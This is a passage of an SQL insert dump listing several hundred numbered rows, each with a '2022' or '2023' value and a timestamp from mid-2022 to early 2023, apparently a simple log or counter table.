(538, 1, 1, '2022', 0, '2022-07-10 02:05:01'),
(539, 1, 1, '2023', 0, '2022-07-10 06:48:33'),
(540, 1, 1, '2022', 0, '2022-07-12 02:09:50'),
(541, 1, 1, '2023', 0, '2022-07-12 03:06:11'),
(542, 1, 1, '2023', 0, '2022-07-12 11:54:03'),
(543, 1, 1, '2022', 0, '2022-07-12 12:13:29'),
(544, 1, 1, '2023', 0, '2022-07-13 02:50:30'),
(545, 1, 1, '2022', 0, '2022-07-13 03:24:16'),
(546, 1, 1, '2023', 0, '2022-07-13 12:39:32'),
(547, 1, 1, '2022', 0, '2022-07-13 13:06:47'),
(548, 1, 1, '2022', 0, '2022-07-14 22:05:47'),
(549, 1, 1, '2023', 0, '2022-07-14 23:04:06'),
(550, 1, 1, '2022', 0, '2022-07-15 17:53:55'),
(551, 1, 1, '2023', 0, '2022-07-15 18:40:52'),
(552, 1, 1, '2022', 0, '2022-07-16 01:04:45'),
(553, 1, 1, '2023', 0, '2022-07-16 03:54:26'),
(554, 1, 1, '2022', 0, '2022-07-16 04:22:00'),
(555, 1, 1, '2022', 0, '2022-07-16 06:36:59'),
(556, 1, 1, '2023', 0, '2022-07-17 05:05:21'),
(557, 1, 1, '2022', 0, '2022-07-17 05:13:32'),
(558, 1, 1, '2022', 0, '2022-07-18 15:55:56'),
(559, 1, 1, '2023', 0, '2022-07-18 17:29:52'),
(560, 1, 1, '2023', 0, '2022-07-19 11:31:06'),
(561, 1, 1, '2022', 0, '2022-07-19 13:43:01'),
(562, 1, 1, '2022', 0, '2022-07-20 07:57:53'),
(563, 1, 1, '2023', 0, '2022-07-20 08:41:59'),
(564, 1, 1, '2023', 0, '2022-07-21 11:36:48'),
(565, 1, 1, '2022', 0, '2022-07-21 11:42:46'),
(566, 1, 1, '2022', 0, '2022-07-25 06:20:54'),
(567, 1, 1, '2023', 0, '2022-07-25 06:42:58'),
(568, 1, 1, '2022', 0, '2022-07-25 19:35:29'),
(569, 1, 1, '2023', 0, '2022-07-25 19:50:56'),
(570, 1, 1, '2022', 0, '2022-07-26 06:27:46'),
(571, 1, 1, '2023', 0, '2022-07-26 07:45:04'),
(572, 1, 1, '2022', 0, '2022-07-27 06:47:35'),
(573, 1, 1, '2023', 0, '2022-07-27 07:51:05'),
(574, 1, 1, '2022', 0, '2022-07-27 16:50:04'),
(575, 1, 1, '2023', 0, '2022-07-27 17:02:08'),
(576, 1, 1, '2022', 0, '2022-07-28 05:09:24'),
(577, 1, 1, '2023', 0, '2022-07-28 05:27:42'),
(578, 1, 1, '2022', 0, '2022-07-29 03:59:48'),
(579, 1, 1, '2023', 0, '2022-07-29 03:59:55'),
(580, 1, 1, '2022', 0, '2022-07-30 05:38:22'),
(581, 1, 1, '2023', 0, '2022-07-30 07:53:05'),
(582, 1, 1, '2022', 0, '2022-07-31 10:02:25'),
(583, 1, 1, '2023', 0, '2022-07-31 10:43:51'),
(584, 1, 1, '2022', 0, '2022-08-01 06:26:20'),
(585, 1, 1, '2023', 0, '2022-08-01 07:22:50'),
(586, 1, 1, '2023', 0, '2022-08-02 04:30:22'),
(587, 1, 1, '2022', 0, '2022-08-02 04:51:16'),
(588, 1, 1, '2023', 0, '2022-08-02 14:31:36'),
(589, 1, 1, '2023', 0, '2022-08-03 13:03:20'),
(590, 1, 1, '2022', 0, '2022-08-03 14:15:53'),
(591, 1, 1, '2022', 0, '2022-08-04 04:10:05'),
(592, 1, 1, '2023', 0, '2022-08-04 05:00:51'),
(593, 1, 1, '2023', 0, '2022-08-05 08:16:18'),
(594, 1, 1, '2022', 0, '2022-08-05 13:26:42'),
(595, 1, 1, '2022', 0, '2022-08-05 20:06:59'),
(596, 1, 1, '2022', 0, '2022-08-06 02:41:38'),
(597, 1, 1, '2022', 0, '2022-08-06 09:13:25'),
(598, 1, 1, '2022', 0, '2022-08-06 15:45:51'),
(599, 1, 1, '2023', 0, '2022-08-06 18:42:59'),
(600, 1, 1, '2022', 0, '2022-08-06 18:45:59'),
(601, 1, 1, '2022', 0, '2022-08-06 22:34:30'),
(602, 1, 1, '2022', 0, '2022-08-07 01:29:18'),
(603, 1, 1, '2022', 0, '2022-08-07 07:55:24'),
(604, 1, 1, '2023', 0, '2022-08-07 10:39:25'),
(605, 1, 1, '2022', 0, '2022-08-07 11:13:25'),
(606, 1, 1, '2023', 0, '2022-08-11 14:37:12'),
(607, 1, 1, '2022', 0, '2022-08-12 23:49:01'),
(608, 1, 1, '2023', 0, '2022-08-13 01:38:10'),
(609, 1, 1, '2022', 0, '2022-08-13 18:40:18'),
(610, 1, 1, '2023', 0, '2022-08-13 19:11:13'),
(611, 1, 1, '2022', 0, '2022-08-14 08:53:50'),
(612, 1, 1, '2023', 0, '2022-08-14 11:13:25'),
(613, 1, 1, '2023', 0, '2022-08-15 13:04:36'),
(614, 1, 1, '2022', 0, '2022-08-15 13:07:39'),
(615, 1, 1, '2022', 0, '2022-08-15 19:09:56'),
(616, 1, 1, '2023', 0, '2022-08-15 20:05:16'),
(617, 1, 1, '2022', 0, '2022-08-16 02:59:50'),
(618, 1, 1, '2023', 0, '2022-08-16 05:47:00'),
(619, 1, 1, '2023', 0, '2022-08-16 14:48:07'),
(620, 1, 1, '2022', 0, '2022-08-16 15:09:02'),
(621, 1, 1, '2023', 0, '2022-08-17 02:20:53'),
(622, 1, 1, '2022', 0, '2022-08-17 04:14:46'),
(623, 1, 1, '2022', 0, '2022-08-19 12:34:53'),
(624, 1, 1, '2023', 0, '2022-08-19 13:07:23'),
(625, 1, 1, '2022', 0, '2022-08-19 22:49:04'),
(626, 1, 1, '2023', 0, '2022-08-20 00:03:27'),
(627, 1, 1, '2023', 0, '2022-08-20 11:48:25'),
(628, 1, 1, '2022', 0, '2022-08-20 14:23:33'),
(629, 1, 1, '2023', 0, '2022-08-21 03:44:50'),
(630, 1, 1, '2022', 0, '2022-08-21 04:22:47'),
(631, 1, 1, '2022', 0, '2022-08-22 08:13:13'),
(632, 1, 1, '2023', 0, '2022-08-22 09:54:34'),
(633, 1, 1, '2023', 0, '2022-08-23 05:48:30'),
(634, 1, 1, '2022', 0, '2022-08-23 06:51:28'),
(635, 1, 1, '2022', 0, '2022-08-24 03:47:42'),
(636, 1, 1, '2023', 0, '2022-08-24 06:39:14'),
(637, 1, 1, '2022', 0, '2022-08-25 16:25:45'),
(638, 1, 1, '2023', 0, '2022-08-25 18:42:08'),
(639, 1, 1, '2022', 0, '2022-08-27 07:27:40'),
(640, 1, 1, '2023', 0, '2022-08-27 10:11:27'),
(641, 1, 1, '2023', 0, '2022-08-27 19:37:53'),
(642, 1, 1, '2022', 0, '2022-08-27 21:44:22'),
(643, 1, 1, '2023', 0, '2022-08-28 07:02:40'),
(644, 1, 1, '2022', 0, '2022-08-28 13:30:34'),
(645, 1, 1, '2023', 0, '2022-08-28 23:57:41'),
(646, 1, 1, '2022', 0, '2022-08-29 04:34:06'),
(647, 1, 1, '2023', 0, '2022-08-30 14:59:05'),
(648, 1, 1, '2022', 0, '2022-08-30 19:48:48'),
(649, 1, 1, '2022', 0, '2022-08-31 06:46:53'),
(650, 1, 1, '2023', 0, '2022-08-31 11:42:15'),
(651, 1, 1, '2022', 0, '2022-09-01 08:44:05'),
(652, 1, 1, '2023', 0, '2022-09-01 12:38:52'),
(653, 1, 1, '2023', 0, '2022-09-02 10:31:28'),
(654, 1, 1, '2022', 0, '2022-09-02 12:21:52'),
(655, 1, 1, '2023', 0, '2022-09-03 13:22:34'),
(656, 1, 1, '2022', 0, '2022-09-04 04:25:35'),
(657, 1, 1, '2023', 0, '2022-09-04 05:00:45'),
(658, 1, 1, '2022', 0, '2022-09-04 19:47:14'),
(659, 1, 1, '2023', 0, '2022-09-04 22:17:16'),
(660, 1, 1, '2023', 0, '2022-09-05 03:17:25'),
(661, 1, 1, '2022', 0, '2022-09-05 08:50:12'),
(662, 1, 1, '2023', 0, '2022-09-06 05:24:48'),
(663, 1, 1, '2022', 0, '2022-09-06 05:30:13'),
(664, 1, 1, '2022', 0, '2022-09-06 09:16:59'),
(665, 1, 1, '2022', 0, '2022-09-06 09:41:19'),
(666, 1, 1, '2023', 0, '2022-09-07 15:47:11'),
(667, 1, 1, '2022', 0, '2022-09-07 15:57:15'),
(668, 1, 1, '2022', 0, '2022-09-08 05:14:41'),
(669, 1, 1, '2023', 0, '2022-09-08 05:37:42'),
(670, 1, 1, '2022', 0, '2022-09-09 08:33:45'),
(671, 1, 1, '2023', 0, '2022-09-09 12:21:43'),
(672, 1, 1, '2023', 0, '2022-09-10 14:33:04'),
(673, 1, 1, '2022', 0, '2022-09-10 15:13:44'),
(674, 1, 1, '2022', 0, '2022-09-11 02:48:28'),
(675, 1, 1, '2023', 0, '2022-09-11 05:30:04'),
(676, 1, 1, '2022', 0, '2022-09-12 16:24:54'),
(677, 1, 1, '2023', 0, '2022-09-12 16:53:27'),
(678, 1, 1, '2022', 0, '2022-09-13 03:17:59'),
(679, 1, 1, '2023', 0, '2022-09-13 03:48:49'),
(680, 1, 1, '2023', 0, '2022-09-14 08:48:05'),
(681, 1, 1, '2022', 0, '2022-09-14 09:43:08'),
(682, 1, 1, '2023', 0, '2022-09-15 11:18:40'),
(683, 1, 1, '2022', 0, '2022-09-15 16:05:59'),
(684, 1, 1, '2023', 0, '2022-09-17 02:16:15'),
(685, 1, 1, '2022', 0, '2022-09-17 08:18:32'),
(686, 1, 1, '2022', 0, '2022-09-17 16:04:27'),
(687, 1, 1, '2023', 0, '2022-09-17 20:49:15'),
(688, 1, 1, '2022', 0, '2022-09-18 02:57:08'),
(689, 1, 1, '2023', 0, '2022-09-18 06:56:35'),
(690, 1, 1, '2023', 0, '2022-09-18 18:40:46'),
(691, 1, 1, '2022', 0, '2022-09-19 05:11:18'),
(692, 1, 1, '2023', 0, '2022-09-19 05:14:54'),
(693, 1, 1, '2022', 0, '2022-09-20 14:42:50'),
(694, 1, 1, '2023', 0, '2022-09-20 15:24:44'),
(695, 1, 1, '2023', 0, '2022-09-21 17:48:38'),
(696, 1, 1, '2022', 0, '2022-09-21 20:28:58'),
(697, 1, 1, '2022', 0, '2022-09-22 08:08:49'),
(698, 1, 1, '2023', 0, '2022-09-22 09:49:11'),
(699, 1, 1, '2023', 0, '2022-09-23 16:34:14'),
(700, 1, 1, '2022', 0, '2022-09-23 16:36:54'),
(701, 1, 1, '2023', 0, '2022-09-24 04:08:46'),
(702, 1, 1, '2023', 0, '2022-09-24 06:30:54'),
(703, 1, 1, '2022', 0, '2022-09-24 07:04:17'),
(704, 1, 1, '2023', 0, '2022-09-25 04:43:52'),
(705, 1, 1, '2022', 0, '2022-09-25 08:32:42'),
(706, 1, 1, '2023', 0, '2022-09-26 04:44:18'),
(707, 1, 1, '2022', 0, '2022-09-26 06:28:08'),
(708, 1, 1, '2022', 0, '2022-09-27 22:36:29'),
(709, 1, 1, '2023', 0, '2022-09-27 23:48:04'),
(710, 1, 1, '2023', 0, '2022-09-28 08:26:25'),
(711, 1, 1, '2022', 0, '2022-09-28 11:16:42'),
(712, 1, 1, '2022', 0, '2022-09-29 07:35:27'),
(713, 1, 1, '2023', 0, '2022-09-29 07:47:57'),
(714, 1, 1, '2022', 0, '2022-09-30 06:20:43'),
(715, 1, 1, '2023', 0, '2022-09-30 06:59:50'),
(716, 1, 1, '2023', 0, '2022-10-01 09:39:53'),
(717, 1, 1, '2022', 0, '2022-10-01 09:54:51'),
(718, 1, 1, '2023', 0, '2022-10-02 11:37:31'),
(719, 1, 1, '2022', 0, '2022-10-02 14:13:01'),
(720, 1, 1, '2023', 0, '2022-10-03 02:53:30'),
(721, 1, 1, '2022', 0, '2022-10-03 04:32:14'),
(722, 1, 1, '2022', 0, '2022-10-03 09:24:03'),
(723, 1, 1, '2023', 0, '2022-10-04 00:42:04'),
(724, 1, 1, '2022', 0, '2022-10-04 01:30:32'),
(725, 1, 1, '2023', 0, '2022-10-05 01:13:53'),
(726, 1, 1, '2022', 0, '2022-10-05 03:03:29'),
(727, 1, 1, '2023', 0, '2022-10-05 04:26:51'),
(728, 1, 1, '2022', 0, '2022-10-05 23:48:57'),
(729, 1, 1, '2023', 0, '2022-10-06 00:01:03'),
(730, 1, 1, '2023', 0, '2022-10-07 03:12:08'),
(731, 1, 1, '2022', 0, '2022-10-07 04:01:07'),
(732, 1, 1, '2022', 0, '2022-10-08 05:23:34'),
(733, 1, 1, '2023', 0, '2022-10-08 05:47:06'),
(734, 1, 1, '2022', 0, '2022-10-09 00:02:51'),
(735, 1, 1, '2023', 0, '2022-10-09 00:14:32'),
(736, 1, 1, '2023', 0, '2022-10-10 00:30:22'),
(737, 1, 1, '2022', 0, '2022-10-10 02:05:31'),
(738, 1, 1, '2022', 0, '2022-10-10 23:45:42'),
(739, 1, 1, '2023', 0, '2022-10-10 23:54:03'),
(740, 1, 1, '2023', 0, '2022-10-12 10:37:24'),
(741, 1, 1, '2022', 0, '2022-10-12 12:48:57'),
(742, 1, 1, '2022', 0, '2022-10-13 13:46:34'),
(743, 1, 1, '2023', 0, '2022-10-13 16:31:09'),
(744, 1, 1, '2023', 0, '2022-10-14 07:44:28'),
(745, 1, 1, '2022', 0, '2022-10-14 07:50:23'),
(746, 1, 1, '2022', 0, '2022-10-15 05:56:11'),
(747, 1, 1, '2023', 0, '2022-10-15 12:44:10'),
(748, 1, 1, '2022', 0, '2022-10-16 10:39:25'),
(749, 1, 1, '2023', 0, '2022-10-16 12:18:05'),
(750, 1, 1, '2022', 0, '2022-10-17 11:06:58'),
(751, 1, 1, '2023', 0, '2022-10-17 13:48:21'),
(752, 1, 1, '2022', 0, '2022-10-18 03:15:35'),
(753, 1, 1, '2023', 0, '2022-10-18 08:22:56'),
(754, 1, 1, '2022', 0, '2022-10-19 12:18:35'),
(755, 1, 1, '2023', 0, '2022-10-19 12:56:08'),
(756, 1, 1, '2022', 0, '2022-10-19 20:51:35'),
(757, 1, 1, '2022', 0, '2022-10-20 04:49:12'),
(758, 1, 1, '2022', 0, '2022-10-20 06:56:37'),
(759, 1, 1, '2023', 0, '2022-10-20 09:38:03'),
(760, 1, 1, '2022', 0, '2022-10-21 07:34:28'),
(761, 1, 1, '2023', 0, '2022-10-21 09:06:01'),
(762, 1, 1, '2022', 0, '2022-10-23 06:31:12'),
(763, 1, 1, '2023', 0, '2022-10-23 06:51:50'),
(764, 1, 1, '2023', 0, '2022-10-24 00:02:58'),
(765, 1, 1, '2022', 0, '2022-10-24 01:36:46'),
(766, 1, 1, '2022', 0, '2022-10-24 14:47:26'),
(767, 1, 1, '2023', 0, '2022-10-24 16:22:50'),
(768, 1, 1, '2023', 0, '2022-10-25 11:54:38'),
(769, 1, 1, '2022', 0, '2022-10-25 14:51:31'),
(770, 1, 1, '2023', 0, '2022-10-26 11:57:58'),
(771, 1, 1, '2022', 0, '2022-10-26 12:29:15'),
(772, 1, 1, '2023', 0, '2022-10-27 15:28:24'),
(773, 1, 1, '2022', 0, '2022-10-27 17:06:59'),
(774, 1, 1, '2022', 0, '2022-10-28 10:22:23'),
(775, 1, 1, '2023', 0, '2022-10-28 12:17:16'),
(776, 1, 1, '2023', 0, '2022-10-30 22:39:26'),
(777, 1, 1, '2022', 0, '2022-10-30 23:22:28'),
(778, 1, 1, '2022', 0, '2022-10-31 18:20:57'),
(779, 1, 1, '2023', 0, '2022-10-31 19:09:15'),
(780, 1, 1, '2023', 0, '2022-10-31 21:05:59'),
(781, 1, 1, '2022', 0, '2022-10-31 22:51:43'),
(782, 1, 1, '2023', 0, '2022-11-01 06:07:39'),
(783, 1, 1, '2022', 0, '2022-11-01 10:31:09'),
(784, 1, 1, '2023', 0, '2022-11-02 08:25:42'),
(785, 1, 1, '2022', 0, '2022-11-02 09:47:11'),
(786, 1, 1, '2023', 0, '2022-11-03 09:26:49'),
(787, 1, 1, '2022', 0, '2022-11-03 15:31:21'),
(788, 1, 1, '2022', 0, '2022-11-04 03:21:53'),
(789, 1, 1, '2023', 0, '2022-11-04 12:02:07'),
(790, 1, 1, '2023', 0, '2022-11-05 03:47:43'),
(791, 1, 1, '2022', 0, '2022-11-05 06:20:14'),
(792, 1, 1, '2023', 0, '2022-11-06 00:40:04'),
(793, 1, 1, '2022', 0, '2022-11-06 03:30:55'),
(794, 1, 1, '2022', 0, '2022-11-07 07:18:06'),
(795, 1, 1, '2023', 0, '2022-11-07 08:06:57'),
(796, 1, 1, '2023', 0, '2022-11-08 17:10:26'),
(797, 1, 1, '2022', 0, '2022-11-08 19:52:57'),
(798, 1, 1, '2023', 0, '2022-11-09 07:38:46'),
(799, 1, 1, '2022', 0, '2022-11-10 07:19:03'),
(800, 1, 1, '2023', 0, '2022-11-10 08:47:34'),
(801, 1, 1, '2022', 0, '2022-11-11 03:13:15'),
(802, 1, 1, '2023', 0, '2022-11-11 05:45:03'),
(803, 1, 1, '2023', 0, '2022-11-12 14:28:10'),
(804, 1, 1, '2022', 0, '2022-11-12 15:32:43'),
(805, 1, 1, '2023', 0, '2022-11-12 18:25:52'),
(806, 1, 1, '2022', 0, '2022-11-13 08:25:27'),
(807, 1, 1, '2023', 0, '2022-11-13 11:57:03'),
(808, 1, 1, '2022', 0, '2022-11-14 04:51:22'),
(809, 1, 1, '2023', 0, '2022-11-14 06:42:38'),
(810, 1, 1, '2022', 0, '2022-11-15 03:19:28'),
(811, 1, 1, '2023', 0, '2022-11-15 08:38:11'),
(812, 1, 1, '2022', 0, '2022-11-16 08:04:41'),
(813, 1, 1, '2023', 0, '2022-11-16 08:19:02'),
(814, 1, 1, '2022', 0, '2022-11-17 08:54:39'),
(815, 1, 1, '2023', 0, '2022-11-17 10:10:30'),
(816, 1, 1, '2022', 0, '2022-11-18 10:01:22'),
(817, 1, 1, '2023', 0, '2022-11-18 10:10:31'),
(818, 1, 1, '2022', 0, '2022-11-19 11:33:08'),
(819, 1, 1, '2023', 0, '2022-11-19 12:04:00'),
(820, 1, 1, '2022', 0, '2022-11-20 02:41:54'),
(821, 1, 1, '2023', 0, '2022-11-20 03:31:52'),
(822, 1, 1, '2022', 0, '2022-11-21 09:14:19'),
(823, 1, 1, '2023', 0, '2022-11-21 11:52:42'),
(824, 1, 1, '2022', 0, '2022-11-22 01:57:56'),
(825, 1, 1, '2023', 0, '2022-11-22 02:37:07'),
(826, 1, 1, '2022', 0, '2022-11-23 03:03:36'),
(827, 1, 1, '2023', 0, '2022-11-23 05:04:09'),
(828, 1, 1, '2023', 0, '2022-11-24 03:24:30'),
(829, 1, 1, '2022', 0, '2022-11-24 05:11:08'),
(830, 1, 1, '2023', 0, '2022-11-25 02:18:00'),
(831, 1, 1, '2022', 0, '2022-11-25 02:59:18'),
(832, 1, 1, '2022', 0, '2022-11-26 09:08:11'),
(833, 1, 1, '2023', 0, '2022-11-26 09:23:34'),
(834, 1, 1, '2023', 0, '2022-11-27 03:02:05'),
(835, 1, 1, '2022', 0, '2022-11-27 05:06:45'),
(836, 1, 1, '2023', 0, '2022-11-28 02:22:58'),
(837, 1, 1, '2022', 0, '2022-11-28 06:14:29'),
(838, 1, 1, '2022', 0, '2022-11-29 00:45:24'),
(839, 1, 1, '2023', 0, '2022-11-29 03:13:39'),
(840, 1, 1, '2022', 0, '2022-11-30 01:51:06'),
(841, 1, 1, '2023', 0, '2022-11-30 04:19:05'),
(842, 1, 1, '2022', 0, '2022-12-01 10:36:53'),
(843, 1, 1, '2023', 0, '2022-12-01 11:26:39'),
(844, 1, 1, '2023', 0, '2022-12-02 08:49:33'),
(845, 1, 1, '2022', 0, '2022-12-02 12:03:29'),
(846, 1, 1, '2023', 0, '2022-12-02 22:48:01'),
(847, 1, 1, '2022', 0, '2022-12-03 07:57:51'),
(848, 1, 1, '2023', 0, '2022-12-03 11:20:53'),
(849, 1, 1, '2023', 0, '2022-12-04 08:04:01'),
(850, 1, 1, '2022', 0, '2022-12-04 08:27:51'),
(851, 1, 1, '2023', 0, '2022-12-05 01:37:21'),
(852, 1, 1, '2022', 0, '2022-12-05 02:07:22'),
(853, 1, 1, '2022', 0, '2022-12-06 05:47:59'),
(854, 1, 1, '2023', 0, '2022-12-06 05:54:31'),
(855, 1, 1, '2022', 0, '2022-12-07 11:00:03'),
(856, 1, 1, '2023', 0, '2022-12-07 12:06:52'),
(857, 1, 1, '2023', 0, '2022-12-08 10:10:16'),
(858, 1, 1, '2022', 0, '2022-12-08 13:24:21'),
(859, 1, 1, '2022', 0, '2022-12-09 06:59:42'),
(860, 1, 1, '2023', 0, '2022-12-09 07:15:37'),
(861, 1, 1, '2022', 0, '2022-12-10 04:31:37'),
(862, 1, 1, '2023', 0, '2022-12-10 07:10:20'),
(863, 1, 1, '2023', 0, '2022-12-11 14:50:53'),
(864, 1, 1, '2022', 0, '2022-12-11 16:50:52'),
(865, 1, 1, '2022', 0, '2022-12-12 06:15:27'),
(866, 1, 1, '2023', 0, '2022-12-12 09:37:02'),
(867, 1, 1, '2022', 0, '2022-12-12 11:01:40'),
(868, 1, 1, '2023', 0, '2022-12-12 14:32:15'),
(869, 1, 1, '2022', 0, '2022-12-13 09:17:26'),
(870, 1, 1, '2023', 0, '2022-12-13 09:47:43'),
(871, 1, 1, '2022', 0, '2022-12-14 10:53:53'),
(872, 1, 1, '2023', 0, '2022-12-14 11:14:09'),
(873, 1, 1, '2023', 0, '2022-12-15 11:33:18'),
(874, 1, 1, '2022', 0, '2022-12-15 16:32:41'),
(875, 1, 1, '2023', 0, '2022-12-17 00:43:40'),
(876, 1, 1, '2022', 0, '2022-12-17 01:09:22'),
(877, 1, 1, '2023', 0, '2022-12-17 11:35:23'),
(878, 1, 1, '2022', 0, '2022-12-17 20:01:28'),
(879, 1, 1, '2022', 0, '2022-12-18 12:25:30'),
(880, 1, 1, '2023', 0, '2022-12-18 21:03:01'),
(881, 1, 1, '2023', 0, '2022-12-19 01:15:38'),
(882, 1, 1, '2022', 0, '2022-12-19 02:46:17'),
(883, 1, 1, '2023', 0, '2022-12-20 09:00:34'),
(884, 1, 1, '2022', 0, '2022-12-20 09:39:31'),
(885, 1, 1, '2023', 0, '2022-12-21 01:58:14'),
(886, 1, 1, '2022', 0, '2022-12-21 04:10:48'),
(887, 1, 1, '2023', 0, '2022-12-22 04:14:38'),
(888, 1, 1, '2022', 0, '2022-12-22 07:03:01'),
(889, 1, 1, '2023', 0, '2022-12-23 00:06:14'),
(890, 1, 1, '2022', 0, '2022-12-23 08:09:29'),
(891, 1, 1, '2023', 0, '2022-12-24 05:05:54'),
(892, 1, 1, '2022', 0, '2022-12-24 06:00:44'),
(893, 1, 1, '2023', 0, '2022-12-24 23:40:52'),
(894, 1, 1, '2022', 0, '2022-12-25 00:59:13'),
(895, 1, 1, '2022', 0, '2022-12-26 03:47:27'),
(896, 1, 1, '2023', 0, '2022-12-26 04:47:21'),
(897, 1, 1, '2022', 0, '2022-12-27 07:41:35'),
(898, 1, 1, '2023', 0, '2022-12-27 09:49:24'),
(899, 1, 1, '2022', 0, '2022-12-28 01:49:31'),
(900, 1, 1, '2023', 0, '2022-12-28 05:07:34'),
(901, 1, 1, '2023', 0, '2022-12-28 23:54:43'),
(902, 1, 1, '2022', 0, '2022-12-29 03:04:44'),
(903, 1, 1, '2023', 0, '2022-12-30 00:25:31'),
(904, 1, 1, '2022', 0, '2022-12-30 01:03:13'),
(905, 1, 1, '2022', 0, '2022-12-31 00:06:24'),
(906, 1, 1, '2023', 0, '2022-12-31 02:01:07'),
(907, 1, 1, '2023', 0, '2022-12-31 23:15:39'),
(908, 1, 1, '2022', 0, '2023-01-01 00:03:32'),
(909, 1, 1, '2023', 0, '2023-01-01 22:32:44'),
(910, 1, 1, '2022', 0, '2023-01-02 00:37:26'),
(911, 1, 1, '2022', 0, '2023-01-02 23:49:50'),
(912, 1, 1, '2023', 0, '2023-01-03 00:14:32'),
(913, 1, 1, '2023', 0, '2023-01-04 03:25:22'),
(914, 1, 1, '2022', 0, '2023-01-04 03:47:39'),
(915, 1, 1, '2023', 0, '2023-01-04 17:01:48'),
(916, 1, 1, '2022', 0, '2023-01-05 02:01:47'),
(917, 1, 1, '2023', 0, '2023-01-05 03:44:45'),
(918, 1, 1, '2022', 0, '2023-01-06 01:30:25'),
(919, 1, 1, '2023', 0, '2023-01-06 05:04:40'),
(920, 1, 1, '2023', 0, '2023-01-08 22:14:21'),
(921, 1, 1, '2022', 0, '2023-01-09 02:16:14'),
(922, 1, 1, '2022', 0, '2023-01-09 09:57:37'),
(923, 1, 1, '2023', 0, '2023-01-09 13:03:57'),
(924, 1, 1, '2022', 0, '2023-01-10 02:32:42'),
(925, 1, 1, '2023', 0, '2023-01-10 05:22:17'),
(926, 1, 1, '2022', 0, '2023-01-10 12:23:51'),
(927, 1, 1, '2023', 0, '2023-01-10 14:10:06'),
(928, 1, 1, '2023', 0, '2023-01-11 06:11:17'),
(929, 1, 1, '2022', 0, '2023-01-11 08:26:58'),
(930, 1, 1, '2022', 0, '2023-01-12 02:55:27'),
(931, 1, 1, '2023', 0, '2023-01-12 05:19:41'),
(932, 1, 1, '2023', 0, '2023-01-13 03:31:24'),
(933, 1, 1, '2022', 0, '2023-01-13 04:02:45'),
(934, 1, 1, '2023', 0, '2023-01-14 10:48:23'),
(935, 1, 1, '2022', 0, '2023-01-14 12:36:18'),
(936, 1, 1, '2022', 0, '2023-01-15 07:13:42'),
(937, 1, 1, '2023', 0, '2023-01-15 08:15:52'),
(938, 1, 1, '2023', 0, '2023-01-16 03:22:39'),
(939, 1, 1, '2022', 0, '2023-01-16 07:54:57'),
(940, 1, 1, '2023', 0, '2023-01-16 20:25:31'),
(941, 1, 1, '2023', 0, '2023-01-17 04:01:05'),
(942, 1, 1, '2022', 0, '2023-01-17 08:16:04'),
(943, 1, 1, '2023', 0, '2023-01-18 05:19:49'),
(944, 1, 1, '2022', 0, '2023-01-18 06:18:03'),
(945, 1, 1, '2023', 0, '2023-01-18 19:28:12'),
(946, 1, 1, '2022', 0, '2023-01-19 02:20:32'),
(947, 1, 1, '2023', 0, '2023-01-19 08:10:45'),
(948, 1, 1, '2022', 0, '2023-01-19 18:46:05'),
(949, 1, 1, '2023', 0, '2023-01-20 05:06:04'),
(950, 1, 1, '2022', 0, '2023-01-20 05:49:07'),
(951, 1, 1, '2022', 0, '2023-01-20 07:57:42'),
(952, 1, 1, '2022', 0, '2023-01-21 07:21:41'),
(953, 1, 1, '2023', 0, '2023-01-21 07:31:16'),
(954, 1, 1, '2023', 0, '2023-01-22 00:13:13'),
(955, 1, 1, '2022', 0, '2023-01-22 02:52:00'),
(956, 1, 1, '2022', 0, '2023-01-23 00:01:19'),
(957, 1, 1, '2023', 0, '2023-01-23 01:17:03'),
(958, 1, 1, '2022', 0, '2023-01-24 09:12:39'),
(959, 1, 1, '2023', 0, '2023-01-24 10:05:38'),
(960, 1, 1, '2022', 0, '2023-01-25 02:40:32'),
(961, 1, 1, '2023', 0, '2023-01-25 06:59:27'),
(962, 1, 1, '2022', 0, '2023-01-26 01:00:16'),
(963, 1, 1, '2023', 0, '2023-01-26 01:33:39'),
(964, 1, 1, '2022', 0, '2023-01-26 17:32:55'),
(965, 1, 1, '2023', 0, '2023-01-27 10:03:17'),
(966, 1, 1, '2022', 0, '2023-01-27 12:20:07'),
(967, 1, 1, '2022', 0, '2023-01-28 06:28:43'),
(968, 1, 1, '2023', 0, '2023-01-28 07:59:59'),
(969, 1, 1, '2022', 0, '2023-01-29 02:45:58'),
(970, 1, 1, '2023', 0, '2023-01-29 04:43:21'),
(971, 1, 1, '2022', 0, '2023-01-29 23:57:36'),
(972, 1, 1, '2023', 0, '2023-01-30 01:30:22'),
(973, 1, 1, '2023', 0, '2023-01-31 05:47:57'),
(974, 1, 1, '2022', 0, '2023-01-31 06:09:14'),
(975, 1, 1, '2023', 0, '2023-02-01 03:37:16'),
(976, 1, 1, '2022', 0, '2023-02-01 07:53:13'),
(977, 1, 1, '2023', 0, '2023-02-02 02:42:06'),
(978, 1, 1, '2022', 0, '2023-02-02 04:37:48'),
(979, 1, 1, '2023', 0, '2023-02-02 22:21:04'),
(980, 1, 1, '2022', 0, '2023-02-03 01:58:55'),
(981, 1, 1, '2022', 0, '2023-02-04 07:31:04'),
(982, 1, 1, '2023', 0, '2023-02-04 07:55:07'),
(983, 1, 1, '2023', 0, '2023-02-04 11:22:21'),
(984, 1, 1, '2022', 0, '2023-02-05 03:32:34'),
(985, 1, 1, '2023', 0, '2023-02-05 03:53:49'),
(986, 1, 1, '2023', 0, '2023-02-06 02:44:57'),
(987, 1, 1, '2022', 0, '2023-02-06 06:35:08'),
(988, 1, 1, '2023', 0, '2023-02-07 05:06:55'),
(989, 1, 1, '2022', 0, '2023-02-07 08:29:50'),
(990, 1, 1, '2023', 0, '2023-02-08 10:11:39'),
(991, 1, 1, '2022', 0, '2023-02-08 10:33:02'),
(992, 1, 1, '2023', 0, '2023-02-09 03:40:57'),
(993, 1, 1, '2022', 0, '2023-02-09 05:42:29'),
(994, 1, 1, '2023', 0, '2023-02-10 01:43:42'),
(995, 1, 1, '2022', 0, '2023-02-10 07:59:10'),
(996, 1, 1, '2023', 0, '2023-02-11 09:36:53'),
(997, 1, 1, '2022', 0, '2023-02-11 09:49:29'),
(998, 1, 1, '2022', 0, '2023-02-12 06:44:04'),
(999, 1, 1, '2023', 0, '2023-02-12 11:44:50'),
(1000, 1, 1, '2023', 0, '2023-02-13 08:22:57'),
(1001, 1, 1, '2022', 0, '2023-02-13 09:33:56'),
(1002, 1, 1, '2022', 0, '2023-02-14 04:22:26'),
(1003, 1, 1, '2023', 0, '2023-02-14 07:43:08'),
(1004, 1, 1, '2022', 0, '2023-02-15 10:20:34'),
(1005, 1, 1, '2023', 0, '2023-02-15 13:53:10'),
